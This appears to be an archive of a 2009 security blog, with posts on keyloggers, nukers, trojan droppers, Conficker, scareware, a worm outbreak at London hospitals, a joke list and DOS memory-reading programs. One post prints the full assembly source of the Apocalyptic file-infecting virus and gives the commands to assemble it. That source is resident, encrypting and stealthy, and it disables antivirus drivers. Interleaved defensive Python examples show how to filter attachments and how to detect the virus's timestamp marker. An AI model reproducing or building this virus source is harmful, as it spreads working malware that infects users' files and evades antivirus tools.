
Tuesday, February 24, 2009

Keylogger Trojan

A keylogger trojan is a malicious program that captures your user names and passwords, logs them to a file and sends the file to the attacker. Some keyloggers are sold commercially. They are generally used by parents to track the online activities of their children, and by people who want to track the contacts and online activities of their partner. Some keyloggers are capable of monitoring your web browser: when a desired response is found, such as the opening of the site of a bank in which you have an account, the keylogger records the required information and sends it to the remote attacker. Some sites require input by mouse rather than by keystrokes, which reduces this kind of attack, but some trojans send screenshots of the victim's application to the remote attacker.
Keyloggers are installed on the victim's machine by making him believe that they are useful software. Most infections come through P2P networks.
To avoid infection, connect only to trusted networks, download software only from trusted sources, use an up-to-date antivirus and install a firewall.

Friday, February 20, 2009

Nuker

A nuker is a trojan that allows an attacker to reboot, shut down or even crash a victim's computer that is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the victim's IP address, the nuker sends packets that make the victim's computer restart, shut down or crash.

Removal of Nuker

Removing a nuker is not so difficult. Most of the antivirus products on the market are able to delete nukers. It can also be deleted manually. For manual disinfection we have to use different methods for different operating systems. The best way is to delete the malware manually and reboot the computer. In Windows 9x and Millennium, go to the command prompt and delete the file using the DEL command. For example, if the file is named nuke.exe in the Windows folder, type:
DEL C:\WINDOWS\NUKE.EXE
and press the ENTER key. Then reboot the system.
Manual disinfection is a risky process, so it is advised only for users who have thorough knowledge of the operating system.

In the case of Windows NT, 2000 and XP, the first thing to do is to rename the nuker (including its extension), then restart the computer and then delete the file manually.

Note that you have to disable System Restore before manual disinfection. When the file is renamed, the operating system will copy the original file to another folder as a backup, which can make the disinfection fail. So System Restore must be disabled.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

Thursday, February 19, 2009

Trojan.Dropper

Trojan.Droppers are trojans that install themselves on a system without informing the user of their presence. Virus writers and hackers usually create trojan droppers to install other applications or to place backdoor applications. It was discovered in February 2000. It is also known as virus.dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003 and Windows XP. However, the threat level is low and it can be easily removed.

However, prevention will reduce the risk of infection. Some of the preventive measures are given below:

  • Use a firewall to block all applications that try to connect to the internet without your permission. This will reduce the risk even after an infection.

  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.

  • Isolate infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software.

  • Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected.

  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.

  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put up a post on disabling AutoPlay in XP and Vista earlier.

  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access to folders that must be shared only to user accounts with strong passwords.

  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack; if they are removed, threats have fewer avenues of attack.

  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up to date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail and DNS services.

  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.

  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.

  • It is recommended to disable System Restore. You will get more information about enabling and disabling System Restore in XP and other operating systems from the links below.


Disable or enable Windows Me System Restore



Disable or enable Windows XP System Restore
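The attachment-blocking measure in the list above can be checked in code. This is an added example written for this page, not something from the original post or from any mail product: it uses Python's standard email library to walk a message and report attachments whose final extension is on the blocked list (.vbs, .bat, .exe, .pif, .scr). The sample message and the placeholder attachment bytes are constructed here; the normalisation of case and trailing dots is an assumption about how a filter should treat names like "Invoice.pdf.EXE", not a rule stated on the page.

```python
import email
import posixpath
from email import policy
from email.message import EmailMessage

# Extensions the post names as commonly used to spread threats.
BLOCKED_EXTENSIONS = {".vbs", ".bat", ".exe", ".pif", ".scr"}


def has_blocked_extension(filename):
    """Policy check on an attachment name.

    Case is ignored and trailing dots/spaces are stripped (Windows ignores them
    when resolving a file type), so 'Invoice.pdf.EXE' and 'run.bat.' are both
    caught, while 'notes.txt' and a bare 'README' pass.
    """
    name = filename.strip().rstrip(". ").lower()
    _, ext = posixpath.splitext(name)
    return ext in BLOCKED_EXTENSIONS


def blocked_attachments(raw_message):
    """Return the filenames of attachments in a raw RFC 822 message that
    violate the policy. Rejecting or stripping the message is left to the MTA."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if filename and has_blocked_extension(filename):
            hits.append(filename)
    return hits


def build_sample_message():
    """Constructed test message: one harmless text attachment and two whose
    names carry blocked extensions (the bytes are placeholders, not programs)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Constructed sample"
    msg.set_content("Please see the attached files.")
    msg.add_attachment("plain notes", filename="notes.txt")
    msg.add_attachment(b"placeholder", maintype="application",
                       subtype="octet-stream", filename="Invoice.pdf.EXE")
    msg.add_attachment(b"placeholder", maintype="application",
                       subtype="octet-stream", filename="screensaver.scr")
    return msg.as_string()


if __name__ == "__main__":
    print(blocked_attachments(build_sample_message()))
```

Checking only the final extension is deliberate: Windows decides the file type from the last extension, so a double extension such as "Invoice.pdf.EXE" is an executable and is caught, while the filter does not need a list of "document-looking" prefixes.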



French Fighters Grounded by Computer Virus

Recent incidents show that even the systems we think to be highly secured are vulnerable to virus attacks. In one incident the French Navy's fighter planes were unable to download their flight plans because the databases were attacked by a Microsoft virus.
However, the French navy admitted that during the time it took to disinfect the virus
The incident forced the defence authorities to use traditional systems like telephone, fax and post. Naval officials said the infection was probably due more to negligence than to a deliberate attempt to compromise French national security. It said it suspected someone at the navy had used an infected USB key.

Wednesday, February 18, 2009

Antivirus 2009- A new virus


A new threat that comes disguised as a genuine antivirus program has become increasingly prevalent. Offering to scan and remove malware from your PC, this rogue will actually install a trojan on your unsuspecting system. The process is usually initiated when you click a link for what you believe is valid security software or its vendor's site.
Such adverts are not only a nuisance when browsing online (fake ads appear on reputable sites that make use of third-party advertising), they are designed to rip off consumers by tempting them to pay for a worthless program. Worse still, these rogue applications infect your PC with a problem they claim can only be 'fixed' by purchasing extra software.

If you have fallen victim to this virus hoax, stop by the Help Desk immediately to reserve time for virus removal from your system.

Tuesday, February 17, 2009

Mysterious New Computer Virus May Be 'Sleeper' Agent

A computer virus that may leave Microsoft Windows users vulnerable to digital hijacking is spreading through companies in the U.S., Europe and Asia, already infecting close to 9 million machines, according to a private online security firm.

Though computer bugs have become a common affliction, Finland-based F-Secure says a virus it has been tracking for the past several weeks has surged more rapidly through corporate networks than anything they've seen in years. But the virus doesn't appear to be working as its designers intended.

F-Secure's chief security adviser, Patrik Runald, said the virus's coding suggests a type of bug that alerts computer users to bogus infections on their machines and offers to help by selling them antivirus software. Instead, the virus is simply spreading to little effect, though it may still pose a threat to infected computers.

Microsoft issued a security update Tuesday to deal with the so-called "Downadup" or "Conficker" virus, which appears to be a new version of a bug that popped up in October. "Over the last couple of weeks, a new variant of this worm has been affecting customers," the company acknowledged in a blog post.

Microsoft said the virus is spreading by gaining access to one computer and then guessing at passwords of other users in the same network: "If the password is weak, it may succeed."

A company representative couldn't immediately be reached Saturday to comment on F-Secure's estimate of infected machines. Most computers with Windows will automatically download Microsoft's security update, but Hypponen said the virus disables updates on infected machines. While the origin of the virus is a mystery, F-Secure's best guess is it came from Ukraine.

Beware of Hackers

Are you sure that you are safe while browsing the internet or downloading anything from it? The anti-malware software you are downloading may itself be malware or may contain malware. Hackers are now using popular names (names of celebrities) to make people download the malware or spyware they have made. One example is on the popular news aggregator Digg: there are reports that 52 accounts were posting news stories or comments with malicious URLs. Many of these posts purport to be news items about celebrities, including actors Christian Bale and Alyssa Milano, singer Britney Spears and Paris Hilton. They contain a link to a video about the celebrity that takes victims to sites that download the Adware/VideoPlay fake anti-malware, or scareware, package when the user clicks on it. Digg reported that it has terminated more than 300 malware accounts. The Digg attacks download the MS Antispyware 2009 scareware package to victims' PCs. It pretends to scan the PC, then reports that the computer is infected with malware and asks the victim to pay by credit card to remove it. The malware creators also own blogs, where they post real and fake stories about celebrities to get the viewer's attention quickly. So be careful when using the internet and downloading from it. Download only from trusted sources.

Monday, February 16, 2009

Apocalyptic

This post is about an old virus, Apocalyptic. It is detected by almost all antivirus software. It appeared in 1996.

The important characteristics of this virus are:

-TSR appending Com/Exe infector
-Has a routine to encrypt and another to decrypt ( ror+add+xor )
-Stealth ( 11h/12h/4eh/4fh/5700h )
-Deactivates Tbdriver when going into mem and when infecting
-Makes the int 3h point to the int21h on infection
-Fools f-prot's 'stealth detection'
-Non-detectable ( in 2nd generation ) by Tbav 7.05, F-prot 2.23c, Scan, Avp and else. TbClean doesn't clean it ( it gets lost with the Z Mcb searching loop,... really that product is a shit )
-Payload: On 26th of July it shows all file with size 029Ah ( 666 )

To assemble the virus code, use:

Tasm virus.asm
Tlink virus.obj
Please do not think that I am promoting the creation of viruses. The details I have given are available on the internet to the public. The source code of Apocalyptic is given below:

.286
HOSTSEG segment BYTE
ASSUME CS:HOSTSEG, SS:CODIGO

Host:
mov ax,4c00h
int 21h

ends

CODIGO segment PARA
ASSUME CS:CODIGO, DS:CODIGO, SS:CODIGO

virus_size equ virus_end-virus_start
encrypt_size equ encrypt_end-encrypt_start

virus_start label byte

org 0h

Letsrock:
call delta ; Entry for Com/Exe
delta:
mov si,sp ; Delta-offset
mov bp,word ptr ss:[si]
sub bp,offset delta
push es ax ds

push cs
pop ds
call tomacha ; I don't call encryption
;on first generation

Encrypt_start label byte

;***************************************************************************
; RESIDENCE
;***************************************************************************


goon:
push es
call tbdriver ; Deactivate TbDriver

mov ah,52h ; Pick list of lists
int 21h
mov si,es:[bx-2] ; First MCB
mov es,si

Mcb_Loop:
cmp byte ptr es:[0],'Z' ; I search last Mcb.
je got_last
cont: add si,es:[3]
inc si
mov es,si
jmp Mcb_Loop

got_last:
pop dx
cmp word ptr es:[1],0h ; Is it free ?
je go_on
cmp word ptr es:[1],dx ; Or with active Psp ?
jne exit
go_on:
cmp word ptr es:[3],((virus_size+15)/16)+1
jb exit ; Is there space for me ?

push es ; If there is, I get resident
pop ds
mov di,es
add di,word ptr es:[3] ; Residence stuff; nothing
sub di,((virus_size+15)/16) ;special
push di
mov es,di
xor di,di
xor si,si
mov cx,8
rep movsw

pop di
inc di
mov word ptr es:[3],((virus_size+15)/16)+1
mov word ptr es:[1],di

mov byte ptr ds:[0],'M'
sub word ptr ds:[3],((virus_size+15)/16)+1
mov di,5
mov cx,12
xor al,al
rep stosb

push es cs
pop ds ax
inc ax
push ax
mov es,ax
xor di,di
mov si,bp
mov cx,(virus_size)
rep movsb

mov ax,3521h
int 21h
pop ds
mov ds:word ptr [int21h],bx
mov ds:word ptr [int21h+2],es
mov ah,25h
lea dx,main_center
int 21h

;***************************************************************************
; RETURN TO HOST
;***************************************************************************

exit:
pop ds ax es

dec byte ptr [flag+bp] ; Was it a Com ?
jz era_un_com

mov si,ds ; Recover stack
add si,cs:word ptr [ss_sp+bp]
add si,10h
cli
mov ss,si
mov sp,cs:word ptr [ss_sp+bp+2]
sti

mov si,ds ; Recover CS:IP
add si,cs:word ptr [cs_ip+bp+2]
add si,10h
push si
push cs:word ptr [cs_ip+bp]

retf ; Return to host

era_un_com:
mov di,100h ; If it's a Com, I make
push di ;it to return
lea si,bp+ss_sp
movsw
movsb
ret

condiciones:
push cx dx ; Payload trigger
mov ah,02ah ; Activates on 26th july
int 21h
cmp dx,071Ah
pop dx cx
jnz nain
stc
ret
nain:
clc
ret

;***************************************************************************
; TBDRIVER
;***************************************************************************

Tbdriver:
xor ax,ax ; Annulates TBdriver,...
mov es,ax ;really, this Av is a
les bx,es:[0084h] ;megashit.
cmp byte ptr es:[bx+2],0eah
jnz volvamos
push word ptr es:[bx+3]
push word ptr es:[bx+5]
mov es,ax
pop word ptr es:[0086h]
pop word ptr es:[0084h]
volvamos: ret

;***************************************************************************
; STEALTH 05700h
;***************************************************************************

Stealth_tiempo:
pushf
call dword ptr cs:[Int21h] ; Calls Int21h
push cx
and cl,01fh
xor cl,01fh
pop cx
jnz nada
or cl,01fh ; Changes seconds
nada:
retf 2

;****************************************************************************
; FCB STEALTH
;****************************************************************************

FCB_Stealth:

pushf ; Stealth of 11h/12h, by
call dword ptr cs:[Int21h] ;FCBs
test al,al
jnz sin_stealth

push ax bx es

mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz No_infectado

mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz Normal_FCB
add bx,7h
Normal_FCB:
mov al,es:[bx+17h]
and al,1fh
xor al,1fh
jnz No_infectado

sub word ptr es:[bx+1dh],Virus_size ; Old lenght of
sbb word ptr es:[bx+1fh],0 ;file and "normal"
and byte ptr es:[bx+17h],0F1h ;seconds

No_infectado:
call condiciones
jnc sin_nada

mov word ptr es:[bx+1dh],029Ah ; Virus's payload
mov word ptr es:[bx+1fh],0h

sin_nada:
pop es bx ax
Sin_stealth: retf 2

;****************************************************************************
; INT 21h
;****************************************************************************

main_center: ; The main center !
cmp ax,5700h
jz stealth_tiempo
cmp ah,11h
jz fcb_stealth
cmp ah,12h
jz fcb_stealth
cmp ah,4eh
jz handle_stealth
cmp ah,4fh
jz handle_stealth
cmp ah,4bh
je ejecutar
jmp saltito

;****************************************************************************
; HANDLE STEALTH
;****************************************************************************

handle_stealth:

pushf ; Handle stealth, functions
call dword ptr cs:[Int21h] ;4eh/4fh
jc adios_handle

pushf
push ax es bx cx

anti_antivirus:

mov ah,62h
int 21h

mov es,bx ; Is it F-prot ?
mov es,word ptr es:[2ch]
xor bx,bx
mov cx,100h
fpr:
cmp word ptr es:[bx],'-F'
jz sin_infectar ; Si lo es, pasamos de hacer
inc bx ;el stealth
loop fpr

mov ah,2fh
int 21h

mov al,es:[bx+16h]
and al,1fh
xor al,1fh
jnz sin_infectar

sub word ptr es:[bx+1ah],Virus_size ; Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds

sin_infectar:
call condiciones
jnc no_payload

mov word ptr es:[bx+1ah],029Ah ; payload
mov word ptr es:[bx+1ch],0h
no_payload:
pop cx bx es ax
popf
adios_handle:
retf 2

;****************************************************************************
; EXE INFECTION
;****************************************************************************

ejecutar:
pushf
push ax bx cx dx si di ds es bp

mov di,ds
mov si,dx

call tbdriver ; deactivates TbDriver

mov ax,3503h ; Int 3h points to the
int 21h ;int 21h: less size and we
push cs ;fuck'em a bit
pop ds
mov ah,25h
lea dx,saltito
int 21h
push es bx ax

mov ax,3524h ; We handle int 24h
int 3h
mov ah,25h
lea dx,int24h
int 3h
push es bx ax

mov ds,di
mov dx,si

Noloes:
mov ax,4300h ; Saves and clears file
int 3h ;attributes
mov ax,4301h
push ax cx dx
xor cx,cx
int 3h

vamos_a_ver_si_exe:

mov byte ptr [flag],00h
mov ax,3d02h ; Opens file
int 3h
jc we_close

infect: xchg ax,bx

push cs
pop ds
mov ah,3fh ; Reads header
mov cx,01ch
lea dx,cabecera
int 3h

mov al,byte ptr [cabecera] ; Makes comprobations
add al,byte ptr [cabecera+1]
cmp al,'M'+'Z'
jnz go_close
cmp word ptr [cabecera+18h],40h
jz go_close
cmp word ptr [cabecera+1ah],0
jnz go_close ; If it's all right, goes on
jmp conti

go_close:
mov ds,di
mov dx,si

buscar_final: cmp byte ptr ds:[si],0 ; Searches end in ds:si
je chequeo
inc si
jmp buscar_final

chequeo:
push cs ; Is it a .COM ?
pop es
lea di,comtxt
sub si,3
cmpsw
jne we_close
jmp infeccion_com

we_close:
jmp close

conti:
mov ax,5700h ; Time/date of file
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

call pointerant
cmp ax,0200h
ja contt
noinz: xor si,si ; To avoid changing
jmp close_ant ;date of non-infected
;files
contt:

push ax
pop si
shr ax,4
shl dx,12
add dx,ax
sub dx,word ptr ds:cabecera+8
push dx

and si,0fh
push si
call copy
pop si

pop dx
mov ds:word ptr [cs_ip+2],dx
inc dx
mov ds:word ptr [ss_sp],dx
mov ds:word ptr [cs_ip],si
mov ds:word ptr [ss_sp+2],((virus_size+100h-15h)/2)*2

call pointerant

mov cx,200h
div cx
inc ax
mov word ptr [cabecera+2],dx
mov word ptr [cabecera+4],ax
mov word ptr [cabecera+0ah],((virus_size)/16)+10h

mov ax,4200h
call pointer
mov cx,1ch
lea dx,cabecera
push cs
pop ds
mov ah,40h
int 3h

close_ant:
pop cx dx ax
or si,si
je close
inc ax
or cl,1fh
int 3h


close:

pop dx cx ax ; Attributes
inc ax
int 21h

mov ah,03eh
int 3h

nahyuck:

pop ax dx ds ; Restores Int 24h y 3h
int 3h
pop ax dx ds
int 3h

pop bp es ds di si dx cx bx ax
popf
jmp saltito

Pointerant:
mov ax,4202h
Pointer:
xor cx,cx
cwd
int 3h
ret

;****************************************************************************
; COM INFECTION
;****************************************************************************


infeccion_com:

mov ax,3d02h ; Open
int 3h
jc close
xchg bx,ax

push cs
pop ds

mov byte ptr [flag],1h ; To make the virus know it's
;a com when restoring
mov ax,5700h ; Time/date
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

quesiquevale:
mov ah,3fh ; Reads beggining of file
mov cx,3
lea dx,ss_sp
int 3h

call pointerant ; Lenght check
cmp ax,0200h
ja puedes_seguir
cmp ax,(0ffffh-virus_size-100h)
jna puedes_seguir
alnoin: jmp noinz

puedes_seguir:
sub ax,3
mov word ptr [cabecera],ax

call copy ; Appending

mov ax,4200h
call pointer

mov ah,40h ; Jumping to code at
lea dx,salt ;beggining
mov cx,3h
int 3h

jmp close_ant

;****************************************************************************
; DATA
;****************************************************************************

autor: db 'Apocalyptic by Wintermute/29A'
comtxt: db 'COM'
flag: db 0
salt: db 0e9h
cabecera: db 0eh dup (90h)
SS_SP: dw 0,offset virus_end+100h
Checksum: dw 0
CS_IP: dw offset host,0
Cequis: dw 0,0,0,0

Encrypt_end label byte

copy:
push cs
pop ds
xor bp,bp ; Don't let bp fuck us
call encryptant ; Encrypts
mov ah,40h ; Copies
mov cx,virus_size
lea dx,letsrock
int 3h
call deencrypt ; Deencrypts
ret

;****************************************************************************
; ENCRYPT ROUTINE
;****************************************************************************

encryptant:
lea si,encrypt_end ; Encrypts
mov cx,encrypt_size
enc_loop: mov dl,byte ptr [si]
sub dl,2h
xor dl,0f9h
ror dl,4
mov byte ptr [si],dl
dec si
loop enc_loop
ret

deencrypt:
lea si,encrypt_end+bp ; Deencrypts
mov cx,encrypt_size
mov di,8
encri: mov dl,byte ptr [si]
mov al,dl
rol dl,4
xor dl,0f9h
add dl,2h
mov byte ptr [si],dl
dec si
loop encri
ret

Int24h: mov al,3
ret
Saltito: db 0eah
int21h: dw 0,0


virus_end label byte

tomacha:
mov cs:word ptr encrypt_start-2+bp,deencrypt-encrypt_start
ret
; This is cause I don't like putting a stupid flag,
; this two commands won't be copied

CODIGO ends
END Letsrock

VSTACK segment para STACK 'Stack'

db 100h dup (90h)

ends
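The characteristics list and the stealth routines above give a defender something concrete to look for: Apocalyptic recognises its own infected files by forcing the 5-bit seconds field of the DOS file time to 1Fh (a value no clean file has, since it would mean 62 seconds), and its payload makes every file appear to be 29Ah (666) bytes on 26 July. The following is an added example, written for this page and not part of the 29A source or of any antivirus product: it decodes constructed DOS find-first records (the DTA layout assumed here, with the time at offset 16h and the size at 1Ah, is the one the handle-stealth routine indexes) and flags the marker. Note that this marker is only visible when the virus is not resident, because the resident 4Eh/4Fh handler rewrites the seconds to a plausible value; scanning from a clean boot is assumed.

```python
import struct

# Self-recognition marker used by Apocalyptic: the 5-bit seconds field of the
# DOS file time is forced to 0x1F (= 62 seconds), which no clean file carries.
INFECTION_SECONDS_MARKER = 0x1F
# Size the payload reports for every file on 26 July (0x29A = 666).
PAYLOAD_SIZE = 0x29A
PAYLOAD_MONTH, PAYLOAD_DAY = 7, 26   # from "cmp dx,071Ah" after INT 21h/AH=2Ah


def pack_dos_time(hour, minute, second_field):
    """Pack a DOS time word: 5 bits hour, 6 bits minute, 5 bits seconds/2."""
    return (hour << 11) | (minute << 5) | second_field


def pack_dos_date(year, month, day):
    """Pack a DOS date word: 7 bits year-1980, 4 bits month, 5 bits day."""
    return ((year - 1980) << 9) | (month << 5) | day


def decode_dos_time(packed):
    return packed >> 11, (packed >> 5) & 0x3F, (packed & 0x1F) * 2


def decode_dos_date(packed):
    return 1980 + (packed >> 9), (packed >> 5) & 0x0F, packed & 0x1F


def has_infection_marker(packed_time):
    """The same test the virus performs: (time & 1Fh) xor 1Fh == 0."""
    return (packed_time & 0x1F) == INFECTION_SECONDS_MARKER


def is_payload_day(month, day):
    return (month, day) == (PAYLOAD_MONTH, PAYLOAD_DAY)


def build_dta_record(name, packed_time, packed_date, size):
    """Constructed INT 21h/4Eh find-first record (assumed DTA layout):
    0x15 attribute, 0x16 time, 0x18 date, 0x1A size (dword), 0x1E ASCIZ name."""
    attr = 0x20  # archive bit; arbitrary for this sample
    return (b"\0" * 0x15 + bytes([attr]) +
            struct.pack("<HHI", packed_time, packed_date, size) +
            name.encode("ascii").ljust(13, b"\0"))


def classify_dta_record(record):
    """Decode one find-first record and report the Apocalyptic indicators."""
    packed_time, packed_date, size = struct.unpack_from("<HHI", record, 0x16)
    name = record[0x1E:0x2B].split(b"\0", 1)[0].decode("ascii")
    h, m, s = decode_dos_time(packed_time)
    return {
        "name": name,
        "time": f"{h:02d}:{m:02d}:{s:02d}",
        "marked_infected": has_infection_marker(packed_time),
        # A listing where every file is 666 bytes is the visible sign of the payload.
        "payload_size_seen": size == PAYLOAD_SIZE,
    }


# Constructed sample listing: one clean file and one carrying the marker.
SAMPLE_RECORDS = [
    build_dta_record("CLEAN.EXE", pack_dos_time(12, 34, 15),
                     pack_dos_date(1996, 3, 1), 24576),
    build_dta_record("INFECT.COM", pack_dos_time(12, 34, INFECTION_SECONDS_MARKER),
                     pack_dos_date(1996, 3, 1), 4096),
]


def scan_listing(records=SAMPLE_RECORDS):
    """Names of files whose timestamp carries the infection marker."""
    return [r["name"] for r in map(classify_dta_record, records) if r["marked_infected"]]


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(classify_dta_record(rec))
    print("suspicious:", scan_listing())
```

The timestamp check is cheap and catches second-generation copies, which the string 'Apocalyptic by Wintermute/29A' does not, because that data lies inside the encrypted region between Encrypt_start and Encrypt_end.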

Sunday, February 15, 2009

Some New Viruses

OPRAH WINFREY VIRUS:
Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.

AT&T VIRUS:
Every three minutes it tells you what great service you are getting.

MCI VIRUS:
Every three minutes it reminds you that you're paying too much for the AT&T virus.

PAUL REVERE VIRUS:
This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:>.

POLITICALLY CORRECT VIRUS:
Never calls itself a "virus", but instead refers to itself as an "electronic microorganism."

RIGHT TO LIFE VIRUS:
Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.

ROSS PEROT VIRUS:
Activates every component in your system, just before the whole darn thing quits.

MARIO CUOMO VIRUS:
It would be a great virus, but it refuses to run.

TED TURNER VIRUS:
Colorizes your monochrome monitor.

ARNOLD SCHWARZENEGGER VIRUS:
Terminates and stays resident. It'll be back.

DAN QUAYLE VIRUS #2:
Their is sumthing rong wit your komputer, ewe jsut cant figyour out watt!

GOVERNMENT ECONOMIST VIRUS:
Nothing works, but all your diagnostic software says everything is fine.

NEW WORLD ORDER VIRUS:
Probably harmless, but it makes a lot of people really mad just thinking about it.

FEDERAL BUREAUCRAT VIRUS:
Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of your computer.

GALLUP VIRUS:
Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time. (plus or minus a 3.5 percent margin of error.)

TERRY RANDALL VIRUS:
Prints "Oh no you don't" whenever you choose "Abort" from the "Abort" "Retry" "Fail" message.

TEXAS VIRUS:
Makes sure that it's bigger than any other file.

ADAM AND EVE VIRUS:
Takes a couple of bytes out of your Apple.

CONGRESSIONAL VIRUS:
The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.

AIRLINE VIRUS:
You're in Dallas, but your data is in Singapore.

FREUDIAN VIRUS:
Your computer becomes obsessed with marrying its own motherboard.

PBS VIRUS:
Your programs stop every few minutes to ask for money.

ELVIS VIRUS:
Your computer gets fat, slow and lazy, then self destructs; only to resurface at shopping malls and service stations across rural America.

OLLIE NORTH VIRUS:
Causes your printer to become a paper shredder.

NIKE VIRUS:
Just does it.

SEARS VIRUS:
Your data won't appear unless you buy new cables, power supply and a set of shocks.

JIMMY HOFFA VIRUS:
Your programs can never be found again.

CONGRESSIONAL VIRUS #2:
Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.

KEVORKIAN VIRUS:
Helps your computer shut down as an act of mercy.

IMELDA MARCOS VIRUS:
Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.

STAR TREK VIRUS:
Invades your system in places where no virus has gone before.

HEALTH CARE VIRUS:
Tests your system for a day, finds nothing wrong, and sends you a bill for $4,500.

GEORGE BUSH VIRUS:
It starts by boldly stating, "Read my docs....No new files!" on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional Virus.

CLEVELAND INDIANS VIRUS:
Makes your 486/50 machine perform like a 286/AT.

LAPD VIRUS:
It claims it feels threatened by the other files on your PC and erases them in "self defense".

CHICAGO CUBS VIRUS:
Your PC makes frequent mistakes and comes in last in the reviews, but you still love it.

ORAL ROBERTS VIRUS:
Claims that if you don't send it a million dollars, it's programmer will take it back.

Friday, February 13, 2009

Windows 7: Security

Most viruses were created for Windows, so more security features have to be added to defend the system from virus and malware threats. The newer versions of Windows are less vulnerable to virus attacks. Windows Vista incorporates several security features which make it more secure against viruses; it was developed to tackle viruses that spread through removable media such as pen drives, CDs and so on. Windows 7 extends this protection to cover removable drives with BitLocker ToGo. The new Internet Explorer 8 will sport new security features such as InPrivate Browsing, which allows you to surf the Web in full anonymity, and a SmartScreen feature to protect against phishing attacks.
But Windows 7 also has limitations. In Windows Vista the user was informed with a pop-up window and asked for confirmation whenever a program tried to change anything in the OS, but this feature became an irritation to most users. It has been modified to a great extent: now the pop-up appears fewer times, only when software makes changes to itself automatically. Some people have reported that this modification may let malware hide in the OS securely. There is also criticism about the administrator account: some people argue that some software can modify the account settings, take over the administrator account and gain control of the whole computer. More security features are incorporated in Windows Vista, but the pop-ups asking for the user's confirmation were disliked by many users.

You will get more information about the BitLocker ToGo from PCMAG.COM

Reading the memory size

In an older post I said that the size of the RAM is calculated during the RAM test performed while booting. The size of the RAM is stored at memory locations 0x413 and 0x414. Here is a C program which reads the size of your RAM in KB. The limitation of this program is that it shows the memory size excluding expanded and extended memory, so it only shows sizes up to 640 KB. If your RAM has a larger capacity, it still shows 640 as the RAM size. The program is shown below:


#include <stdio.h>
#include <conio.h>

/* Turbo C (16-bit DOS) program: the BIOS stores the conventional memory
   size in KB as a word at linear address 0x413 (segment 0040h, offset 0013h). */
void main()
{
    unsigned int far *mem;
    mem = (unsigned int far *)0x413;     /* far pointer 0000:0413 */
    printf("\nBase memory size=%u KB", *mem);
    getch();                             /* wait for a key press */
}

There is another way to find out the RAM size, which has the same limitations as above. Below is a C++ program which gets the RAM size using the function biosmemory():


#include <iostream.h>
#include <conio.h>
#include <bios.h>

/* Turbo C++ (16-bit DOS) program: biosmemory() from bios.h returns the
   conventional memory size in KB, so it is also limited to 640 KB. */
void main()
{
    int mem;
    mem = biosmemory();
    cout << "The size of your RAM is:" << mem << " KB";
    getch();                             /* wait for a key press */
}

Note that the output of the program is limited to 640 KB.

Wednesday, February 4, 2009

Virus attack at London hospitals

Three hospitals in London are reported to have shut down their entire computer network due to infection by a variant of the Mytob worm. The hospitals subjected to the attack are St Bartholomew's (also known as Barts) in the City, the Royal London Hospital in Whitechapel and The London Chest Hospital in Bethnal Green. Some sources report that these attacks were completely avoidable.
The virus infects Windows applications and spreads itself to all the e-mail addresses on the infected computers. The hospitals reported that the incident affected the well-being of patients, but there was no evidence that the attacks compromised patient safety. Manual systems were implemented while the computer services were restored, with top priority given to patient services.
The trust says that it used antivirus software and that it was updated daily, but it was wrongly configured on some computers. This left open a back door through which Mytob rapidly infiltrated the trust's network of 4,700 PCs. Antivirus companies have known about Mytob since 2005. Theatre operations were postponed, though they were restored immediately. Staff deferred patient appointments because doctors were unable to make safe and effective clinical decisions without access to diagnostic results on computers.

You will get more information from
http://www.bartsandthelondon.org.uk/formedia/press/release.asp?id=2054&sid=10
http://www.computerweekly.com/Articles/2009/01/28/234477/virus-attack-at-london-hospitals-was-entirely-avoidable.htm

Sunday, February 1, 2009

AntiViruses: How to choose?

